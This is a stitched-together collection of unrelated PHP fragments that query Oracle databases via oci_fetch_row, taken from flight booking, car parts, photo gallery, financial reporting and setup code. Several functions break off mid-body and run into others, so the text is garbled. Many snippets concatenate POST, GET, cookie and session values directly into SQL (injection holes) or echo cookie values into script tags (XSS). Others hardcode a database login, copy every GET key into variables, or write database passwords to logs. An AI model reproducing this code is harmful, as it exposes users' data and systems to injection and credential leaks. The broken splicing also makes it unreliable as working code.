function loginChk($conn)
{
isset($_POST["email"]);
isset($_POST["pass1"]);
global $username, $password, $password_enc;
/* *** A1 - Injection attacks, converted all SQL statments to include binding/placeholders to prevent injection attacks.
*
*/
//check password in database
$s = oci_parse($conn, "SELECT username FROM tblusers WHERE username=:username_prefix AND password=:pw");
oci_bind_by_name($s, ':username_prefix', $username);
oci_bind_by_name($s, ':pw', $password_enc);
oci_execute($s);
//evaluate based on db information
$res = oci_fetch_row($s);
if ($res) {
oci_free_statement($s);
oci_close($conn);
return true;
} else {
oci_free_statement($s);
oci_close($conn);
echo "Username or password were incorrect.</br> Please try to login again, <a href='login.html'>click to return to login page</a>.";
return false;
}
}
function db_fetch_array()
{
$r = array();
while (($row = oci_fetch_row($this->sid)) != false) {
array_push($r, $row);
}
return $r;
}
public function lastInsertId($name = '')
{
if (!$name) {
return false;
}
if (($result = oci_parse($this->link, 'SELECT ' . $name . '.CURRVAL FROM dual')) && @oci_execute($result, $this->autocommit ? OCI_COMMIT_ON_SUCCESS : OCI_DEFAULT)) {
$row = oci_fetch_row($result);
return intval($row[0]);
}
return false;
}
function getReview($flightDesc)
{
ini_set('display_errors', 'On');
$db = "w4111c.cs.columbia.edu:1521/adb";
$conn = oci_connect("kpg2108", "test123", $db);
$stmt = oci_parse($conn, "Select u.fname,f.flight_desc,r.travel_date,r.description from review r join flight f on R.FLIGHT_ID = F.FLIGHT_ID join users u on R.USER_ID = u.user_id where F.FLIGHT_DESC = '" . $flightDesc . "'");
oci_define_by_name($stmt, 'NUM_ROWS', $this->num_rows);
oci_execute($stmt);
oci_close($conn);
$arrayOfReviewDetails = array();
while ($row = oci_fetch_row($stmt)) {
$review = new Review();
$review->setFlightName($row[0]);
$review->setFlightDescription($row[1]);
$review->setTravelDate($row[2]);
$review->setReviewDescription($row[3]);
array_push($arrayOfReviewDetails, $review);
}
return $arrayOfReviewDetails;
}
/**
* Created by PhpStorm.
* User: Allan Wiz
* Date: 4/7/15
* Time: 9:01 AM
*/
function valid_date()
{
//Get current system time
global $conn;
$now = time();
//$today=date('l');
//Initialise next working date
$next_working_date_ts = $now;
//Fetch holidays and put them in an array
$holidays = array();
$sql = "Select HDATE FROM HOLIDAYS";
$hdays = oci_parse($conn, $sql);
oci_execute($hdays);
while ($row = oci_fetch_row($hdays)) {
$holidays[] = $row[0];
}
//Get cutoff time
$qru = "select CUTOFF FROM syssettings";
$reslt = oci_parse($conn, $qru) or die(oci_error());
oci_execute($reslt);
$fetch = oci_fetch_row($reslt);
$cutoff = $fetch[0];
$week_days = array('Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday');
$weekend_days = array('Saturday', 'Sunday');
if (date('Hi', $now) < $cutoff && in_array(date('l'), $week_days)) {
$next_working_date_ts += 86400;
} else {
if (date('Hi', $now) > $cutoff && in_array(date('l'), $week_days)) {
$next_working_date_ts += 172800;
} else {
}
}
while (in_array(strtoupper(date('d-M-y', $next_working_date_ts)), $holidays) || in_array(date('l', $next_working_date_ts), $weekend_days)) {
$next_working_date_ts += 86400;
if (!in_array(strtoupper(date('d-M-y', $next_working_date_ts)), $holidays) && !in_array(date('l', $next_working_date_ts), $weekend_days)) {
//$next_working_date_ts += 86400;
function getFlightDetails($flightClassId)
{
ini_set('display_errors', 'On');
$db = "w4111c.cs.columbia.edu:1521/adb";
$conn = oci_connect("kpg2108", "test123", $db);
$stmt = oci_parse($conn, "Select F.FLIGHT_DESC,C.Class_name,F.DEPARTURE_DATE,F.ARRIVAL_DATE,A.A_NAME,A1.A_NAME,\r\n\t\tFC.COST , F.FLIGHT_MILES ,FC.NO_OF_SEATS from Flight_class fc join flight f on FC.FLIGHT_ID = f.flight_id join class c on fc.class_id = \r\n\t\tc.class_id join Route r on F.ROUTE_ID = R.ROUTE_ID join airport a on R.DESTINATION_AIRPORT_ID = A.AIRPORT_ID \r\n\t\tjoin airport a1 on R.SOURCE_AIRPORT_ID = A1.AIRPORT_ID where FC.FLIGHT_CLASS_ID='{$flightClassId}'");
oci_execute($stmt);
oci_close($conn);
$flightDetails = new FlightDetails();
while ($row = oci_fetch_row($stmt)) {
$flightDetails->setFlightClassId($flightClassId);
$flightDetails->setflightName($row[0]);
$flightDetails->setclassName($row[1]);
$flightDetails->setdepartureTime($row[2]);
$flightDetails->setarrivalTime($row[3]);
$flightDetails->setdestination($row[4]);
$flightDetails->setsource($row[5]);
$flightDetails->setfare($row[6]);
$flightDetails->setFlightMiles($row[7]);
$flightDetails->setSeatsAvailable($row[8]);
}
return $flightDetails;
}
function displaySkillOptionInfo()
{
global $conn;
// Get Skill List and ID Form
$skillListSQL = "SELECT S.skillTitle, S.skill_ID FROM SKILL S";
$skillListSTID = oci_parse($conn, $skillListSQL);
// Execute and Check Errors
oci_execute($skillListSTID, OCI_DEFAULT);
$err = oci_error($skillListSTID);
if ($err) {
oci_rollback($conn);
$err_code = $err['code'];
$error_msg = "SKILL LIST RETRIEVE ERROR. Some unknown database error occurred. Please inform database administrator with these error messages.<br>\n" . "Error code : " . $err['code'] . "<br>" . "Error message : " . $err['message'] . "<br>";
echo $error_msg;
} else {
while ($row = oci_fetch_row($skillListSTID)) {
echo "<input type='hidden' name='skill[]' value='" . $row[1] . "'>";
echo "<input type='checkbox' name='skill[]' value='" . $row[1] . "'>" . $row[0];
echo "<select name='skilllevel[]'>\n\t\t\t\t\t\t<option value='0'>0</option>\n\t\t\t\t\t\t<option value='1'>1</option>\n\t\t\t\t\t\t<option value='2'>2</option>\n\t\t\t\t\t\t<option value='3'>3</option>\n\t\t\t\t\t\t<option value='4'>4</option>\n\t\t\t\t\t\t<option value='5'>5</option>\n\t\t\t\t\t\t</select>";
echo "<br>";
}
}
}
function deleteBookings($ticketId)
{
ini_set('display_errors', 'On');
$db = "w4111c.cs.columbia.edu:1521/adb";
$conn = oci_connect("kpg2108", "test123", $db);
$stmt10 = "Select ticket_miles from ticket where ticket_id='" . $ticketId . "'";
$stmt11 = oci_parse($conn, $stmt10);
$result11 = oci_execute($stmt11);
$var;
while ($row = oci_fetch_row($stmt11)) {
$var = $row[0];
}
$var = $_SESSION['userMiles'] - $var;
if ($var < 0) {
$var = 0;
}
$stmtUpdate = "update users set Miles='" . $var . "' where user_id='" . $_SESSION['userId'] . "'";
$stmtUpdate1 = oci_parse($conn, $stmtUpdate);
$result3 = oci_execute($stmtUpdate1);
$_SESSION['userMiles'] = $var;
$stmt = "Delete from Payment where ticket_id = '" . $ticketId . "'";
$stmt1 = oci_parse($conn, $stmt);
$result1 = oci_execute($stmt1);
$stmt = "Delete from passenger where ticket_id = '" . $ticketId . "'";
$stmt1 = oci_parse($conn, $stmt);
$result2 = oci_execute($stmt1);
$stmt = "Delete from ticket where ticket_id = '" . $ticketId . "'";
$stmt1 = oci_parse($conn, $stmt);
$result3 = oci_execute($stmt1);
oci_close($conn);
if ($result1 && $result2 && $result3) {
return true;
} else {
echo "false";
}
}
} else {
require_once 'connection.php';
$tmp = explode("/", $_POST['date']);
$date = "to_date('" . $tmp[2] . "/" . $tmp[0] . "/" . $tmp[1] . "', 'yyyy/mm/dd')";
$sql_sel = "SELECT * FROM Combination C WHERE C.day =" . $date;
$stmt_sel = oci_parse($conn, $sql_sel);
oci_execute($stmt_sel, OCI_DEFAULT);
$err = oci_error($stmt_sel);
if ($err) {
$err_message = "Some unknown error occured: " . $err['message'] . "<br \\>";
} else {
if (empty($stmt_sel)) {
echo "No dressing is planned in the date you selected." . "< br \\>";
} else {
echo "<table>";
while ($sub = oci_fetch_row($stmt_sel)) {
echo "<th>";
echo "<td>Dress type: " . $sub[3] . " </td><td>Purpose: " . $sub[1] . " </td>";
echo "<td><button onclick='browse(" . $sub[0] . ")''>Click me to browse!</button></td>";
echo "</th>";
}
echo "</table>";
}
oci_close($conn);
}
// Show error message.
if (isset($err_message)) {
echo $err_message;
}
}
}
function printLayOver($firstid, $secondid)
{
$layover = oci_fetch_row(executePlainSQL("select F2.departtime-F1.arrivaltime from Flight F1, Flight F2\n\t\t\t\t\t\t\t\t\twhere F1.fid='{$firstid}' AND F2.fid='{$secondid}'"));
$layovertime = parseDate($layover[0], 2);
echo "<br>Lay over for {$layovertime}";
}
/**
* {@inheritdoc}
*/
public function fetchColumn($columnIndex = 0)
{
$row = oci_fetch_row($this->_sth);
return $row[$columnIndex];
}
<a href="customers.php"> Customers </a> <br>
<a href="part.php"> Part Lookup </a> <br>
<b> Car Lookup </b> <br>
</div>
<div id=textBody>
<h2> Car Lookup </h2>
<?php
require 'connect.php';
print "Search for a car (case sensitive): <form method=post action=car.php> Make: <input type=text name=MAKE> Model: <input type=text name=MODEL><input type=submit value='Search'></form>";
if (array_key_exists('MAKE', $_POST)) {
if ($_POST['MAKE'] != NULL && $_POST['MODEL'] != NULL) {
$partQuery = oci_parse($conn, "select * from car where make like '%" . $_POST['MAKE'] . "%' and model like '%" . $_POST['MODEL'] . "%' order by 2,3 asc ");
} elseif ($_POST['MAKE'] != NULL && $_POST['MODEL'] == NULL) {
$partQuery = oci_parse($conn, "select * from car where make like '%" . $_POST['MAKE'] . "%' order by 2,3 asc ");
} elseif ($_POST['MAKE'] == NULL && $_POST['MODEL'] != NULL) {
$partQuery = oci_parse($conn, "select * from car where model like '%" . $_POST['MODEL'] . "%' order by 2,3 asc ");
} else {
$partQuery = oci_parse($conn, "select * from car order by 2,3 asc ");
}
oci_execute($partQuery);
print "<table cellpadding=8 cellspacing=3 ><tr><th bgcolor=F5F5CD> Vin Num </th> <th bgcolor=F5F5CD> Make </th> <th bgcolor=F5F5CD> Model </th><th bgcolor=F5F5CD> Year</th><th bgcolor=F5F5CD> Color </th><th bgcolor=F5F5CD> Mileage </th></tr>";
while ($info = oci_fetch_row($partQuery)) {
print "<tr><td bgcolor=F5F5CD>" . $info[0] . "</td><td bgcolor=F5F5CD>" . $info[1] . "</td><td bgcolor=F5F5CD>" . $info[2] . "</td><td bgcolor=F5F5CD>" . $info[3] . "</td><td bgcolor=F5F5CD>" . $info[4] . "</td><td bgcolor=F5F5CD>" . $info[5] . "</td></tr>";
}
print "</table>";
}
?>
</div>
</div>
</body>
</html>
protected function _fetch_row()
{
// XXX: There seems to be a bug with oci_fetch_array($this->_result, (OCI_NUM + OCI_RETURN_LOBS))
/*if($this->has_bound_lobs)
{
return @oci_fetch_row($this->_result);
}
return @oci_fetch_array($this->_result, (OCI_NUM + OCI_RETURN_LOBS));*/
$row = @oci_fetch_row($this->_result);
if (!$row) {
return false;
}
if (!$this->has_bound_lobs) {
foreach ($row as &$v) {
if (is_object($v)) {
$v = $v->load();
}
}
}
return $row;
}
/**
* Fetches the next row from a result set.
*
* @param int|null $fetchMode Controls how the next row will be returned to
* the caller. This value must be one of the PDO::FETCH_* constants,
* defaulting to value of PDO::ATTR_DEFAULT_FETCH_MODE (which defaults to
* PDO::FETCH_BOTH).
* @param int $cursorOrientation For a PDOStatement object representing a
* scrollable cursor, this value determines which row will be returned to
* the caller. This value must be one of the PDO::FETCH_ORI_* constants,
* defaulting to PDO::FETCH_ORI_NEXT. To request a scrollable cursor for
* your PDOStatement object, you must set the PDO::ATTR_CURSOR attribute
* to PDO::CURSOR_SCROLL when you prepare the SQL statement with
* PDO::prepare.
* @param int $cursorOffset [optional]
* @return mixed The return value of this function on success depends on the
* fetch type. In all cases, FALSE is returned on failure.
* @todo Implement cursorOrientation and cursorOffset
*/
public function fetch($fetchMode = null, $cursorOrientation = PDO::FETCH_ORI_NEXT, $cursorOffset = 0)
{
// If not fetchMode was specified, used the default value of or the mode
// set by the last call to setFetchMode()
if ($fetchMode === null) {
$fetchMode = $this->fetchMode;
}
// Convert array keys (or object properties) to lowercase
$toLowercase = $this->getAttribute(PDO::ATTR_CASE) == PDO::CASE_LOWER;
// Convert null value to empty string
$nullToString = $this->getAttribute(PDO::ATTR_ORACLE_NULLS) == PDO::NULL_TO_STRING;
// Convert empty string to null
$nullEmptyString = $this->getAttribute(PDO::ATTR_ORACLE_NULLS) == PDO::NULL_EMPTY_STRING;
// Determine the fetch mode
switch ($fetchMode) {
case PDO::FETCH_BOTH:
$rs = oci_fetch_array($this->sth);
// Fetches both; nice!
if ($rs === false) {
return false;
}
if ($toLowercase) {
$rs = array_change_key_case($rs);
}
if ($this->returnLobs && is_array($rs)) {
foreach ($rs as $field => $value) {
if (is_object($value)) {
$rs[$field] = $value->load();
}
}
}
return $rs;
case PDO::FETCH_ASSOC:
$rs = oci_fetch_assoc($this->sth);
if ($rs === false) {
return false;
}
if ($toLowercase) {
$rs = array_change_key_case($rs);
}
if ($this->returnLobs && is_array($rs)) {
foreach ($rs as $field => $value) {
if (is_object($value)) {
$rs[$field] = $value->load();
}
}
}
return $rs;
case PDO::FETCH_NUM:
$rs = oci_fetch_row($this->sth);
if ($rs === false) {
return false;
}
if ($this->returnLobs && is_array($rs)) {
foreach ($rs as $field => $value) {
if (is_object($value)) {
$rs[$field] = $value->load();
}
}
}
return $rs;
case PDO::FETCH_COLUMN:
$rs = oci_fetch_row($this->sth);
$colno = (int) $this->fetchColNo;
if (is_array($rs) && array_key_exists($colno, $rs)) {
$value = $rs[$colno];
if (is_object($value)) {
return $value->load();
} else {
return $value;
}
} else {
return false;
}
break;
case PDO::FETCH_OBJ:
case PDO::FETCH_INTO:
case PDO::FETCH_CLASS:
case PDO::FETCH_CLASS | PDO::FETCH_PROPS_LATE:
$rs = oci_fetch_assoc($this->sth);
if ($rs === false) {
return false;
}
if ($toLowercase) {
$rs = array_change_key_case($rs);
}
if ($fetchMode === PDO::FETCH_INTO) {
if (is_object($this->fetchIntoObject)) {
$object = $this->fetchIntoObject;
} else {
// Object to set into has not been set
return false;
}
} else {
if ($fetchMode === PDO::FETCH_OBJ) {
$className = '\\stdClass';
$ctorargs = array();
} else {
$className = $this->fetchClassName;
$ctorargs = $this->fetchCtorArgs;
}
if ($ctorargs) {
$reflectionClass = new \ReflectionClass($className);
$object = $reflectionClass->newInstanceArgs($ctorargs);
} else {
$object = new $className();
}
}
// Format recordsets values depending on options
foreach ($rs as $field => $value) {
// convert null to empty string
if (is_null($value) && $nullToString) {
$rs[$field] = '';
}
// convert empty string to null
if (empty($rs[$field]) && $nullEmptyString) {
$rs[$field] = null;
}
// convert LOB to string
if ($this->returnLobs && is_object($value)) {
$object->{$field} = $value->load();
} else {
$object->{$field} = $value;
}
}
return $object;
}
return false;
}
<?php
session_start();
global $session, $database;
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
include 'header.php';
include '../classes/aardb_conn.php';
require_once '../functions/sanitize.php';
?>
<div id="page-wrapper">
<div class="row">
<div class="col-lg-12">
<h4 class="page-header">Registration Panel</h4>
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
<style type="text/css">
.form-group.required .control-label:after {
content: "*";
color: #ff0000;
}
</style>
<div class="row">
<div class="panel panel-default">
<div class="panel-heading">
REGISTER MEMBER
</div>
public function sql_fetch_row($res)
{
return oci_fetch_row($res);
}
}
if (array_key_exists('numtickets', $_COOKIE)) {
$numtickets = $_COOKIE['numtickets'];
echo "<script>document.getElementById('numtickets').value='{$numtickets}'</script>";
}
if (array_key_exists('flightclass', $_COOKIE)) {
$flightclass = $_COOKIE['flightclass'];
echo "<script>document.getElementById('flightclass').value='{$flightclass}'</script>";
}
// The above set the drop down lists according to the cookies, will not work if we don't reload
// the page as done by header("location:flights.php")
// The below do the magical/legendary/highly-inefficient search query to Oracle for retrieving flight
// data according to user's search criteria
if (strcmp($depcity, "") !== 0 && strcmp($descity, "") !== 0) {
$departap = oci_fetch_row(executePlainSQL("select code from Airport where city='{$depcity}' AND country='{$depcountry}'"));
$arrivalap = oci_fetch_row(executePlainSQL("select code from Airport where city='{$descity}' AND country='{$descountry}'"));
if (strcmp($_COOKIE['maxnumtrans'], "inf") == 0) {
echo "<script>document.getElementById('maxnumtransinf').checked=true</script>";
$flights = executePlainSQL("select * from allFlight \n\t\t\t\t\t\t\t\t\t\t\twhere firstid IN (select fid from Flight\n\t\t\t\t\t\t\t \t\t\t \t\t\t\t\t where departap='{$departap['0']}')\n\t\t\t\t\t AND thirdid IN (select fid from Flight\n\t\t\t\t\t \t where arrivalap='{$arrivalap['0']}')\n\t\t\t\t\t AND dt1>='{$flightdate}'\n\t\t\t\t\t ORDER BY totalprice");
} else {
$flights = executePlainSQL("select * from allFlight where ((firstid IN (select fid from Flight\n\t\t\t\t\t\t\t \t\t\t where departap='{$departap['0']}' AND arrivalap='{$arrivalap['0']}')\n\t\t\t\t\t\t\t\t\t\t AND secondid IS NULL AND thirdid IS NULL) \n\t\t\t\t\t OR (firstid IN (select fid from Flight\n\t\t\t\t\t \t\t\t\twhere departap='{$departap['0']}')\n\t\t\t\t\t AND secondid IN (select fid from Flight\n\t\t\t\t\t \t where arrivalap='{$arrivalap['0']}')\n\t\t\t\t\t AND thirdid IS NULL))\n\t\t\t\t\t\t\t\t\t\t\tAND dt1>='{$flightdate}'\n\t\t\t\t\t ORDER BY totalprice");
}
//print_r($flightdate);
$locations = array($departap[0], $depcity, $depcountry, $arrivalap[0], $descity, $descountry);
printFlights($flights, $locations);
}
}
}
?>
</div>
</body>
print "<tr><td bgcolor=F5F5DC colspan=2> Select Payment Method</td> <td bgcolor=F5F5DC><select name=PAYMETHOD> <option value=CASH> Cash </option> <option value=CREDIT> Credit </option> <option value=CHECK> Check </option> </select> </td></tr>";
print "<tr><td bgcolor=F5F5DC colspan=3 align=center> <input type=hidden name=CONFIRMPURCHASE> <input type=hidden name=PARTNUM value='" . $_POST['PARTNUM'] . "'> <input type=hidden name=VINNUM value='" . $_POST['VINNUM'] . "'> <input type=hidden name=SPID value=" . $spdata[0] . " ><input type=submit value='Confirm Transaction'> </td> </tr> </form> </table>";
}
}
if (array_key_exists('CONFIRMPURCHASE', $_POST)) {
$custQuery = oci_parse($conn, "select first, last from customers where cust_id='" . $_POST['CUSTID'] . "'");
oci_execute($custQuery);
$customer = oci_fetch_row($custQuery);
if ($customer[0] == NULL) {
print "Error: there is no customer with the given ID.";
} elseif ($_POST['PRICE'] == NULL) {
print "Error: please enter a price.";
} else {
$trQuery = oci_parse($conn, "select i.vin_num, c.make, c.model, p.part_desc, i.cost from inventory i, part p, car c where i.vin_num=c.vin_num and i.part_num=p.part_num and i.part_num=" . $_POST['PARTNUM'] . " and i.vin_num='" . $_POST['VINNUM'] . "'");
oci_execute($trQuery);
$info = oci_fetch_row($trQuery);
print "<i> Please confirm this transaction. </i>";
print "<table cellspacing=5 cellpadding=5 bgcolor=F5F5DC>";
print "<tr><td> VIN Number </td> <td> " . $info[0] . " </td> </tr>";
print "<tr><td> Car Make </td> <td> " . $info[1] . " </td> </tr>";
print "<tr><td> Car Model </td> <td> " . $info[2] . "</td> </tr>";
print "<tr><td> Part Description</td> <td> " . $info[3] . " </td> </tr>";
print "<tr><td> Customer Name</td> <td> " . $customer[0] . " " . $customer[1] . " </td> </tr>";
print "<tr><td> Pay Method </td> <td> " . $_POST['PAYMETHOD'] . " </td> </tr>";
print "<tr><td> Original Cost </td> <td> " . $info[4] . " </td> </tr>";
print "<tr><td> Price </td> <td> " . $_POST['PRICE'] . " </td> </tr>";
print "<tr><td colspan=2 align=center> <form method=post action=purchase.php><input type=hidden name=VINNUM value=" . $info[0] . "><input type=hidden name=PARTNUM value=" . $_POST['PARTNUM'] . "><input type=hidden name=CUSTID value=" . $_POST['CUSTID'] . "><input type=hidden name=SPID value=" . $_POST['SPID'] . ">";
print "<input type=hidden name=PRICE value=" . $_POST['PRICE'] . "> <input type=hidden name=PAYMETHOD value=" . $_POST['PAYMETHOD'] . "><input type=hidden name=FINALIZE> <input type=submit value='Finalize'> </form> </td> </tr></table>";
}
}
if (array_key_exists('FINALIZE', $_POST)) {
<h2>Photos</h3>
<br></br>
<h4 style="text-align:left;float:left;"></h4>
<form class="" action="update.php" method="post">
<?php
session_start();
echo "<table border='5'; style='width:100%'>\n";
echo "<tr>\n";
$counter = 0;
foreach ($_SESSION['search_result'] as $image_id) {
$sql = 'SELECT photo FROM images WHERE photo_id = :ID';
$conn = $newDB->getConnection();
$stmt = oci_parse($conn, $sql);
oci_bind_by_name($stmt, ':ID', $image_id);
oci_execute($stmt);
while (($arr = oci_fetch_row($stmt)) != false) {
$pic = $arr['0']->load();
$_POST['photo_id'] = $image_id;
echo '<td><p><a href="moreinfo.php?photo_id=' . $image_id . '"><img src="Data:image/jpeg;base64,' . base64_encode($pic) . '" class="img-rounded" alt="Cover" height="100" width="100">';
echo '</a></p>';
echo '<br></br>';
$counter = $counter + 1;
if ($counter == 6) {
$counter = 0;
echo "</tr>\n";
}
}
}
echo "</tr>\n";
echo "</table>\n";
?>
<!-- Change Personal Information-->
<div id="divChangePerson">
<?php
$conn = connect();
//Pull all personal data
$sqlp = ' SELECT *
FROM persons p
WHERE p.person_id = \'' . $_COOKIE['Person'] . '\'';
$stidp = oci_parse($conn, $sqlp);
$res = oci_execute($stidp, OCI_DEFAULT);
if (!$res) {
$err = oci_error($stidp);
echo htmlentities($err['message']);
}
$persons = oci_fetch_row($stidp);
//Display current personal data in all fields
echo '<h3>Personal Information change for ' . $persons[1] . ' ' . $persons[2] . ' </h3>';
echo '<form name = "changeperson" method = "post" action = "changeperson.php">';
echo 'First Name: <input type = "text" name="fname" value = ' . $persons[1] . ' /> <br/>';
echo 'Last Name: <input type = "text" name="lname" value = ' . $persons[2] . ' /> <br/>';
echo 'Address: <input type = "text" name="addr" value = ' . $persons[3] . ' /> <br/>';
echo 'Email: <input type = "text" name="email" value = ' . $persons[4] . ' /> <br/>';
echo 'Phone: <input type = "text" name="phone" value = ' . $persons[5] . ' /> <br/>';
echo '<input type = "submit" name = "changeperson" value = "Change Personal Info" /></form>';
?>
</div>
</div> <!-- end of container-->
<script type="text/javascript">
//Logout button on click
/**
* Get a result row as an enumerated array
* @return mixed
*/
public function fetchRow()
{
return oci_fetch_row($this->resource);
}
/**
* @param resource $connection
*/
private function createDBUser($connection)
{
$name = $this->dbuser;
$password = $this->dbpassword;
$query = "SELECT * FROM all_users WHERE USERNAME = :un";
$stmt = oci_parse($connection, $query);
if (!$stmt) {
$entry = $this->trans->t('DB Error: "%s"', array($this->getLastError($connection))) . '<br />';
$entry .= $this->trans->t('Offending command was: "%s"', array($query)) . '<br />';
\OC_Log::write('setup.oci', $entry, \OC_Log::WARN);
}
oci_bind_by_name($stmt, ':un', $name);
$result = oci_execute($stmt);
if (!$result) {
$entry = $this->trans->t('DB Error: "%s"', array($this->getLastError($connection))) . '<br />';
$entry .= $this->trans->t('Offending command was: "%s"', array($query)) . '<br />';
\OC_Log::write('setup.oci', $entry, \OC_Log::WARN);
}
if (!oci_fetch_row($stmt)) {
//user does not exists let's create it :)
//password must start with alphabetic character in oracle
$query = 'CREATE USER ' . $name . ' IDENTIFIED BY "' . $password . '" DEFAULT TABLESPACE ' . $this->dbtablespace;
$stmt = oci_parse($connection, $query);
if (!$stmt) {
$entry = $this->trans->t('DB Error: "%s"', array($this->getLastError($connection))) . '<br />';
$entry .= $this->trans->t('Offending command was: "%s"', array($query)) . '<br />';
\OC_Log::write('setup.oci', $entry, \OC_Log::WARN);
}
//oci_bind_by_name($stmt, ':un', $name);
$result = oci_execute($stmt);
if (!$result) {
$entry = $this->trans->t('DB Error: "%s"', array($this->getLastError($connection))) . '<br />';
$entry .= $this->trans->t('Offending command was: "%s", name: %s, password: %s', array($query, $name, $password)) . '<br />';
\OC_Log::write('setup.oci', $entry, \OC_Log::WARN);
}
} else {
// change password of the existing role
$query = "ALTER USER :un IDENTIFIED BY :pw";
$stmt = oci_parse($connection, $query);
if (!$stmt) {
$entry = $this->trans->t('DB Error: "%s"', array($this->getLastError($connection))) . '<br />';
$entry .= $this->trans->t('Offending command was: "%s"', array($query)) . '<br />';
\OC_Log::write('setup.oci', $entry, \OC_Log::WARN);
}
oci_bind_by_name($stmt, ':un', $name);
oci_bind_by_name($stmt, ':pw', $password);
$result = oci_execute($stmt);
if (!$result) {
$entry = $this->trans->t('DB Error: "%s"', array($this->getLastError($connection))) . '<br />';
$entry .= $this->trans->t('Offending command was: "%s"', array($query)) . '<br />';
\OC_Log::write('setup.oci', $entry, \OC_Log::WARN);
}
}
// grant necessary roles
$query = 'GRANT CREATE SESSION, CREATE TABLE, CREATE SEQUENCE, CREATE TRIGGER, UNLIMITED TABLESPACE TO ' . $name;
$stmt = oci_parse($connection, $query);
if (!$stmt) {
$entry = $this->trans->t('DB Error: "%s"', array($this->getLastError($connection))) . '<br />';
$entry .= $this->trans->t('Offending command was: "%s"', array($query)) . '<br />';
\OC_Log::write('setup.oci', $entry, \OC_Log::WARN);
}
$result = oci_execute($stmt);
if (!$result) {
$entry = $this->trans->t('DB Error: "%s"', array($this->getLastError($connection))) . '<br />';
$entry .= $this->trans->t('Offending command was: "%s", name: %s, password: %s', array($query, $name, $password)) . '<br />';
\OC_Log::write('setup.oci', $entry, \OC_Log::WARN);
}
}
//get values, check that person id isn't null
if ($_POST['personIDU'] != NULL) {
$user_ID = $_POST['personIDU'];
} else {
echo 'No person ID given';
echo '<p><a href="usermanagementIn.php">Go Back</a>';
exit;
}
//get person with requested id
$sqlGetPerson = "SELECT * from persons \n\t\t\tWHERE person_id = :id";
$getPerson = oci_parse($conn, $sqlGetPerson);
oci_bind_by_name($getPerson, ":id", $user_ID);
$res = oci_execute($getPerson);
//go through each field to see if it was updated,
// otherwise set it to value from query
$row = oci_fetch_row($getPerson);
if ($_POST['personFirstU'] != NULL) {
$first = $_POST['personFirstU'];
} else {
$first = $row[1];
}
if ($_POST['personLastU'] != NULL) {
$last = $_POST['personLastU'];
} else {
$last = $row[2];
}
if ($_POST['personAddressU'] != NULL) {
$address = $_POST['personAddressU'];
} else {
$address = $row[3];
}
public function getListTable()
{
$pRs = $this->query(sgbd_syntax_oracle::getListTable());
$tCol = array();
if (empty($pRs)) {
return $tCol;
}
while ($tRow = oci_fetch_row($pRs)) {
$tCol[] = $tRow[0];
}
return $tCol;
}
function sql_fetch_data($sqltype, $result)
{
if ($sqltype == 'mysql') {
if (class_exists('mysqli_result')) {
return $result->fetch_row();
} elseif (function_exists('mysql_fetch_row')) {
return mysql_fetch_row($result);
}
} elseif ($sqltype == 'mssql') {
if (function_exists('sqlsrv_fetch_array')) {
return sqlsrv_fetch_array($result, 1);
} elseif (function_exists('mssql_fetch_row')) {
return mssql_fetch_row($result);
}
} elseif ($sqltype == 'pgsql') {
return pg_fetch_row($result);
} elseif ($sqltype == 'oracle') {
return oci_fetch_row($result);
} elseif ($sqltype == 'sqlite3') {
return $result->fetchArray(1);
} elseif ($sqltype == 'sqlite') {
return sqlite_fetch_array($result, 1);
} elseif ($sqltype == 'odbc') {
return odbc_fetch_array($result);
} elseif ($sqltype == 'pdo') {
return $result->fetch(2);
}
}
foreach ($_GET as $key => $value) {
${$key} = $value;
}
$datefrom = sanitize($datefrom);
$dateto = sanitize($dateto);
if ($datefrom == NULL || $dateto == NULL) {
$datey = date('d/m/Y');
$sql = "SELECT TRANS_AMOUNT.TRANS_ID,TRANS_AMOUNT.TRANS_TYPE, TO_CHAR(TRANS_AMOUNT.TRANS_DATE, 'DD.MM.YYYY:HH24:MI:SS'), TRANS_AMOUNT.MEMBER_NO, TRANS_AMOUNT.DOC_NO, TRANS_AMOUNT.FULL_NAME, TRANS_AMOUNT.PORTFOLIO, TRANS_AMOUNT.CANCELREASON, TRANS_AMOUNT.AMOUNT FROM TRANS INNER JOIN TRANS_AMOUNT ON TRANS_AMOUNT.TRANS_ID = TRANS.RECONCILED WHERE TRUNC(trans_amount.trans_date)=TO_DATE('{$datey}','DD/MM/YYYY:HH24:MI:SS') and trans_amount.bnkcode='" . $_SESSION['Branchcode'] . "' AND TRANS_AMOUNT.RECONCILED = 0 AND TRANS.CONFIRMED = 1 AND TRANS.REVERSED = 1 ";
} else {
$sql = "SELECT TRANS_AMOUNT.TRANS_ID,TRANS_AMOUNT.TRANS_TYPE, TO_CHAR(TRANS_AMOUNT.TRANS_DATE, 'DD.MM.YYYY:HH24:MI:SS'), TRANS_AMOUNT.MEMBER_NO, TRANS_AMOUNT.FULL_NAME, TRANS_AMOUNT.DOC_NO, TRANS_AMOUNT.PORTFOLIO,TRANS_AMOUNT.CANCELREASON, TRANS_AMOUNT.AMOUNT FROM TRANS INNER JOIN TRANS_AMOUNT ON TRANS_AMOUNT.TRANS_ID = TRANS.RECONCILED where TRUNC(trans_amount.trans_date) BETWEEN TO_DATE('" . cleanInput($datefrom) . "','DD/MM/YYYY:HH24:MI:SS') AND TO_DATE('" . cleanInput($dateto) . "','DD/MM/YYYY:HH24:MI:SS') and trans_amount.bnkcode='" . $_SESSION['Branchcode'] . "' AND TRANS_AMOUNT.RECONCILED = 0 AND TRANS.CONFIRMED =1 AND TRANS.REVERSED = 1 ORDER BY trans_amount.TRANS_DATE ASC";
}
$result = oci_parse($conn, $sql) or die("");
oci_execute($result, OCI_DEFAULT);
?>
<div id="page-wrapper">
<div class="row">
<div class="col-lg-12">
<h4 class="page-header">CANCELLED TRANSACTIONS</h4>
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-12">
<div class="panel panel-default">
<div class="panel-heading">
CANCELLED TRANSACTION REPORTS
</div>
<!-- /.panel-heading -->
<div class="panel-body">
<form id="members" data-toggle="validator" enctype="multipart/form-data" method="get" action="">
<?php
/**
* Created by PhpStorm.
* User: Allan Wiz
* Date: 5/14/15
* Time: 8:30 AM
*/
include 'admin_header.php';
include '../classes/aardb_conn.php';
include 'controller/add_rates.php';
$psql = "SELECT security_code, descript, adm_fee FROM securities where descript='Balanced Fund'";
$presult = oci_parse($conn, $psql) or die(" ");
oci_execute($presult);
